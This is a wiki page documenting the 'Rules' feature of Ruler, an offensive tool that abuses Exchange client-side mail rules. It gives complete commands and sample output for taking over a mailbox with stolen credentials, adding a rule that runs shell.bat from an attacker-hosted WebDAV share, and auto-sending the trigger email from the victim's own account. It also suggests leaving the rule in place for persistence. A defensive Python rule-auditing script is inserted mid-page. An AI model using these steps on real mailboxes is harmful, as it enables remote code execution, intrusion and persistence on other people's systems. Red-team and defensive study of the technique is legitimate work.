Etienne Stalmans edited this page May 11, 2017 · 2 revisions

Rules

The Rules command allows you to create client-side mail rules, which execute an application. This can be used to retrieve and execute a remotely hosted application/file and gain a shell on the target host. The attack was originally found and described in the Silentbreak blog by @monoxgas.

Silentbreak did a great job with this attack and it has served us well. The only downside has been that it takes time to get set up. Cloning a mailbox into a new instance of Outlook can be time-consuming, and then there is all the clicking it takes to get a mail rule created. Wouldn't a command-line version of this attack be great? And that is how Ruler was born.

Functions

The Rules command/function has a few options. These are:

  • check -- check if we can access the mailbox
  • display -- display all existing rules
  • delete -- delete a rule
  • add -- add a new rule
  • send -- send an email, using the user's own account, to trigger a rule

Check

Check is a simple command to verify access to a mailbox and that you are able to interact with it.

./ruler --email user@targetdomain.com --username username check

Display

Once you have a set of credentials you can target the user's mailbox. Here you'll need to know their email address (address book searching is in the planned extension).

./ruler  --email user@targetdomain.com --username username display

Output:

./ruler  --username john.ford --email john.ford@evilcorp.ninja display
Password:
[*] Retrieving MAPI info
[*] Doing Autodiscover for domain
[+] MAPI URL found:  https://mail.evilcorp.ninja/mapi/emsmdb/?MailboxId=7bb476d4-8e1f-4a57-bbd8-beac7912fb77@evilcorp.ninja
[+] User DN:  /o=Evilcorp/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=beb65f5c92f74b868c138f7bcec7bfb8-John Ford
[*] Got Context, Doing ROPLogin
[*] And we are authenticated
[*] Openning the Inbox
[+] Retrieving Rules
[+] Found 0 rules

Delete

To delete rules, use either the ruleId displayed next to the rule name (000000df1), or the rule name. You will be prompted to verify the rule being deleted if you supply only the name.

./ruler --email user@targetdomain.com --username username delete --id 000000df1
./ruler --email user@targetdomain.com --username username delete --name myrule

Add

This is where you add your rule to execute an application.

Webdav

Your initial setup is the same as outlined in the Silentbreak blog: set up your WebDAV server to host your payload. A basic WebDAV server is included in this repository. It can be found here. To use it:

go run webdavserv.go -d /path/to/directory/to/serve

Create a Rule

To create the new rule with Ruler:

./ruler --email user@targetdomain.com --username username add --location "\\\\yourserver\\webdav\\shell.bat" --trigger "popashell" --name maliciousrule

The various parts:

  • --location this is the location of your remote shell; note the doubled backslashes (or c:/Windows/system32/calc.exe)
  • --trigger the string within the subject you want to trigger the rule
  • --name a name for your rule

Output:

[*] Retrieving MAPI info
[*] Doing Autodiscover for domain
[+] MAPI URL found:  https://mail.evilcorp.ninja/mapi/emsmdb/?MailboxId=7bb476d4-8e1f-4a57-bbd8-beac7912fb77@evilcorp.ninja
[+] User DN:  /o=Evilcorp/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=beb65f5c92f74b868c138f7bcec7bfb8-John Ford
[*] Got Context, Doing ROPLogin
[*] And we are authenticated
[*] Openning the Inbox
[*] Adding Rule
[*] Rule Added. Fetching list of rules...
[+] Found 1 rules
Rule: shell RuleID: 01000000127380b1

You should now be able to send an email to your target with the trigger string in the subject line. From testing, the mail rule is synchronised nearly instantaneously, so in most cases you should be able to get a shell almost immediately, assuming Outlook is open and connected.
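Seen from the defensive side, the rule created above is an application-launch action whose target is a remote path. The following added example (not part of Ruler or of the original wiki) triages an inventory of mailbox rule actions for exactly that pattern. The `RuleRecord` schema, the action names and the extension list are assumptions, and the sample records are constructed from the path forms shown on this page.

```python
import ntpath
import re
from dataclasses import dataclass

# Extensions that execute when launched directly (illustrative, not exhaustive).
RISKY_EXT = {".bat", ".cmd", ".com", ".exe", ".hta", ".js", ".lnk", ".ps1", ".scr", ".vbs"}
UNC_RE = re.compile(r"^\\\\([^\\@]+)(@[^\\]+)?\\")

@dataclass
class RuleRecord:  # one exported rule action (hypothetical export schema)
    mailbox: str
    name: str
    action: str   # assumed names, e.g. "start_application", "move_to_folder"
    target: str   # application path when action is start_application

def normalise(path: str) -> str:
    """Fold forward slashes and shell-doubled backslashes into a canonical Windows path."""
    p = path.strip().strip('"').replace("/", "\\")
    lead = len(p) - len(p.lstrip("\\"))
    body = re.sub(r"\\+", lambda m: "\\", p[lead:])
    return ("\\\\" if lead >= 2 else "\\" * lead) + body

def classify(rec: RuleRecord):
    """Return (severity, reasons) for an application-launch rule, else None."""
    if rec.action != "start_application":
        return None
    path = normalise(rec.target)
    reasons = []
    unc = UNC_RE.match(path)
    if unc:
        reasons.append("remote-host:" + unc.group(1).lower())
        if unc.group(2):  # host@SSL or host@port form used by the WebDAV redirector
            reasons.append("webdav-host-syntax")
    ext = ntpath.splitext(path)[1].lower()
    if ext in RISKY_EXT:
        reasons.append("executable-ext:" + ext)
    return ("high" if unc else "medium", reasons)

def audit(records):
    """Report every rule that launches an application, remote targets first."""
    hits = [(r.mailbox, r.name, *c) for r in records if (c := classify(r))]
    return sorted(hits, key=lambda h: h[2] != "high")

# Constructed sample records; the paths mirror the forms shown on this page.
SAMPLE = [
    RuleRecord("john.ford@evilcorp.ninja", "newsletters", "move_to_folder", "Newsletters"),
    RuleRecord("john.ford@evilcorp.ninja", "calc", "start_application", "c:/Windows/system32/calc.exe"),
    RuleRecord("john.ford@evilcorp.ninja", "maliciousrule", "start_application", r"\\\\yourserver\\webdav\\shell.bat"),
]
```

Calling `audit(SAMPLE)` reports the two application-launch rules, with the UNC-hosted one ranked first, and ignores the ordinary move-to-folder rule.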

Semi-Autopwn

If you want to automate the triggering of the rule, Ruler is able to create a new message in the user's inbox, using their own email address. This means you no longer need to send an email to your target. Simply use the --send flag when creating your rule, and Ruler will wait 30 seconds for your rules to synchronise (adjust this in the source if you think 30s is too long/short) and then send an email via MAPI.

To customise the email sent with the --send flag, you can use --subject to specify a custom subject (remember to include your trigger word in the subject). Customise the body with --body.

...
[*] Adding Rule
[*] Rule Added. Fetching list of rules...
[+] Found 1 rules
Rule: autopop RuleID: 010000000c4baa84
[*] Auto Send enabled, wait 30 seconds before sending email (synchronisation)
[*] Sending email
[*] Message sent, your shell should trigger shortly.
[*] And disconnecting from server

Send

If you want to send the email manually, using the target's own email address, you can also call the send command directly.

./ruler --email user@targetdomain.com send --subject test --body "this is a test"

Enjoy your shell and don't forget to clean up after yourself by deleting the rule (or leave it for persistence).
